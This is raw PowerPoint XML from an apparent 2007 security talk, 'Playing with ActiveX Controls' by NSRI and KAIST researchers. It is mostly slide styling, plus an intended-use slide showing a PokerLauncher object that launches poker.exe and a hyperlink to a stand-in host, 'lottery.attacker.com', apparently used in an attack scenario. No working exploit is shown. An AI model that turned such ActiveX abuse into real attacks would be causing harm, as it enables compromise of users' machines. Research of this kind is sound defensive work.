              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 넷째 수준</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 다섯째 수준</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="450850" y="180975"/>
            <a:ext cx="9863138" cy="1008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306" tIns="45654" rIns="91306" bIns="45654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제목 스타일 편집</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8217" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6570663" y="0"/>
            <a:ext cx="4032250" cy="1365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91408" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h    t    t    p    :    /    /    w    w    w    .    n    s    r    i    .    r    e    .    k    r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0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hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="32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latinLnBrk="1" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
          <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
          <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
          <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
          <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base" latinLnBrk="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
          <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base" latinLnBrk="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
          <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base" latinLnBrk="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
          <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base" latinLnBrk="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
          <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        <a:buBlip>
          <a:blip r:embed="rId16"/>
        </a:buBlip>
        <a:defRPr kumimoji="1" sz="2500">
          <a:solidFill>
            <a:srgbClr val="003366"/>
          </a:solidFill>
          <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
          <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-287338" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId17"/>
        </a:buBlip>
        <a:defRPr kumimoji="1" sz="2100">
          <a:solidFill>
            <a:srgbClr val="003366"/>
          </a:solidFill>
          <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
          <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        <a:buBlip>
          <a:blip r:embed="rId18"/>
        </a:buBlip>
        <a:defRPr kumimoji="1" sz="1900">
          <a:solidFill>
            <a:srgbClr val="003366"/>
          </a:solidFill>
          <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
          <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-231775" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
        <a:buBlip>
          <a:blip r:embed="rId19"/>
        </a:buBlip>
        <a:defRPr kumimoji="1" sz="1700">
          <a:solidFill>
            <a:srgbClr val="003366"/>
          </a:solidFill>
          <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
          <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId20"/>
        </a:buBlip>
        <a:defRPr kumimoji="1" sz="1700">
          <a:solidFill>
            <a:srgbClr val="003366"/>
          </a:solidFill>
          <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
          <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="l" rtl="0" fontAlgn="base" latinLnBrk="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId20"/>
        </a:buBlip>
        <a:defRPr kumimoji="1" sz="1700">
          <a:solidFill>
            <a:srgbClr val="003366"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2971800" indent="-228600" algn="l" rtl="0" fontAlgn="base" latinLnBrk="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId20"/>
        </a:buBlip>
        <a:defRPr kumimoji="1" sz="1700">
          <a:solidFill>
            <a:srgbClr val="003366"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3429000" indent="-228600" algn="l" rtl="0" fontAlgn="base" latinLnBrk="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId20"/>
        </a:buBlip>
        <a:defRPr kumimoji="1" sz="1700">
          <a:solidFill>
            <a:srgbClr val="003366"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3886200" indent="-228600" algn="l" rtl="0" fontAlgn="base" latinLnBrk="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId20"/>
        </a:buBlip>
        <a:defRPr kumimoji="1" sz="1700">
          <a:solidFill>
            <a:srgbClr val="003366"/>
          </a:solidFill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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.wmf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5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.wmf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6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lottery.attacker.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.wmf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0.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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1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5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2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6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3.xml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7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4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2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.wmf"/><Relationship Id="rId4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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.wmf"/><Relationship Id="rId4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4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.wmf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16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altLang="ko-KR" smtClean="0"/>
              <a:t>Playing with ActiveX Controls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr lIns="91370" tIns="45685" rIns="91370" bIns="45685"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2007. 4.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Su Yong Kim, Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Hoon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Lee(NSRI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Sung </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Deok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Cha(KAIST)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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B99014F7-B844-4E79-840F-A86F4F6C1D67}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX Control: Intended Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18438" name="Picture 10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gray">
          <a:xfrm>
            <a:off x="488916" y="1636713"/>
            <a:ext cx="2571750" cy="20701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sp>
        <p:nvSpPr>
          <p:cNvPr id="18439" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4989513" y="4424363"/>
            <a:ext cx="3600450" cy="719137"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33378"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1" smtClean="0"/>
              <a:t>Play poker online</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3060684" y="3780631"/>
            <a:ext cx="714380" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33333"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="10800000" rev="5400000"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" noProof="1"/>
              <a:t>Execute poker.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18445" name="Picture 2" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\7BPRR1SS\MCj03465630000[1].wm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060575" y="4567238"/>
            <a:ext cx="2643188" cy="2303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Picture 2" descr="C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\j0285750.wmf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904890" y="1637491"/>
            <a:ext cx="2942536" cy="2143140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="그룹 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2900129" y="1967812"/>
            <a:ext cx="1361942" cy="1741381"/>
            <a:chOff x="2900129" y="1967812"/>
            <a:chExt cx="1361942" cy="1741381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Picture 13" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\NOBCR1O3\MCj02899620000[1].wmf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads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2905118" y="1967812"/>
              <a:ext cx="1356953" cy="16818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8" name="TextBox 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2900129" y="3432194"/>
              <a:ext cx="1303563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ko-KR" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PokerLauncher</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="직사각형 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="488916" y="1993900"/>
            <a:ext cx="2928958" cy="1631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en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="PokerLauncher" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="30000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;param name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="Server" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="30000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>      value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
